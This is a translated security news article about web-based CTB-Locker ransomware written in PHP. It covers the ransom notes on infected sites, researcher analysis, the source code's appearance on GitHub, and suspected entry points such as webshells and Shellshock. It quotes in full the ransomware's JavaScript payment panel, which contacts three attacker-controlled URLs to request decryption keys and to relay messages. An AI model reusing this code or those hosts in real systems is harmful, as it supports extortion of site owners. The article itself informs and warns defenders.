The source code of the Web-based ransomware CTB-LockerPHP appeared on the GitHub-based ransomware CTB-Locker and its Web evolutionary version appeared, which can infect websites. According to the analysis, the code is written in PHP, and the source code has been hosted on GitHub.
The first appearance of CTB-Locker
On the eve of Valentine's Day in the West this year, a British webmaster found that the website he managed was tampered, the information displayed on the tampered page looks similar to the computer infected with malicious ransomware. the main information is to allow the site administrator to pay bitcoin in exchange for decryption of the corresponding directory files, to restore the site to normal. Tampered pages such,
After being verified as the first extortion incident against the web page, the incident received great attention. But in fact, as a server administrator, the beginning is just a hope that this is only a one-time event, rather than the start of an attacker's premeditation.
In the initial phase, no other infection events were detected, but the situation has changed significantly over the past week. During this period, the above-mentioned website ransomware incidents frequently occurred. It is reported that more than 100 incidents of the same type have been detected. In the tampered information, the behind-the-scenes operator asked the victim to pay 0.4 Bitcoins. if the payment was not completed within two days, the payment quota would be increased to 0.8. The source code for Bitcoin payment is as follows:
《script》admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];iadmin = 0;domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);function post_admin(postdata, onsuccess) { $.post(admins[iadmin], postdata+"&domain="+domain, function (data) { if (data["status"] == "success") { onsuccess(data); } else { alert(data["status"]); } }, 'json' ).fail(function() { alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again'); iadmin = (iadmin + 1) % 3; });}$('#decrypt').click(function() { post_admin("decrypt=", function(data) { alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!'); url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?'); window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"]; });});$('#dectest').click(function() { post_admin("dectest=&secret="+($("#secret").val()), function(data) { alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!'); url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?'); window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"]; });});$('#sendmsg').click(function() { msg = "&msg=" + encodeURIComponent($("#chatmsg").val()); post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) { alert('Thank you for feedback!'); });});$('#recvmsg').click(function() { post_admin("recvmsg=&secret="+$("#secret").val(), function(data) { $("#chatmsg").val(data["answer"]); });}); 《script》
The ransomware is in the same model as CTB-Locker on the ransomware payment notification. However, technically, this is not consistent with the situation of CTB-Locker ransomware, which is widely known. Because it only runs in a Windows desktop environment, it cannot run on a Linux Web server.
The Web version of CTB-Locker is written in PHP
Benkow, a security analyst from Stormshield, attempts to analyze ransomware run modes and extract source code from an infected object. Subsequently, Benkow uploaded the CTB-Locker source code of the Web version to the KernelMode forum for analysis and research by other security researchers. The "popularity" of CTB-Locker of the Web version is rapidly improved, and its source code is also hosted on GitHub.
For the source code address, click: GitHub
Considering that previously, the ransomware Hidden Tear source code was hosted on GitHub, but things did not go forward in favor of users. Combined with the current situation, we can predict that in the next few months, there may be a large number of attacks against website infections.
According to Benkow research and analysis, the Web version of CTB-Locker is written in PHP, which uses high-strength AES-256 encryption algorithm. For details, refer to the source code on GitHub.
Infection points are still unknown
No way has this ransomware infected the server host. It is worth noting that, according to statistics, most (73%) of infected hosts run the Exim service (SMTP server) on both Linux and Windows systems ). Benkow also added that,
Most hosts run a webshell, which can be accessed through the 'logout. php' dynamic page.
In addition, many infected sites are still found to have the Shellshock vulnerability, which was released more than a year ago. According to statistics, the major problem is that most websites often ignore the vulnerabilities of their own sites and fail to fix them. as a result, these vulnerabilities may be exploited by attackers.
Previously, ransomware infected Web servers
In February, security researchers discovered that Linux. the Encoder ransomware family already has functions for Web servers. according to research and analysis, Linux. encoder is written in C and C ++, but it is not associated with CTB-Locker of the Web version.
Conclusion
In the increasingly severe security situation, site administrators should update their site versions to the latest version. When possible, multiple scanning tools should be used for cross-detection to scan vulnerabilities on managed sites, so as to promptly discover and fix and reinforce vulnerabilities.
* Reference source: soft, github, ker, and FB editor troy. For more information, see FreeBuf hacker and geek (FreeBuf. COM)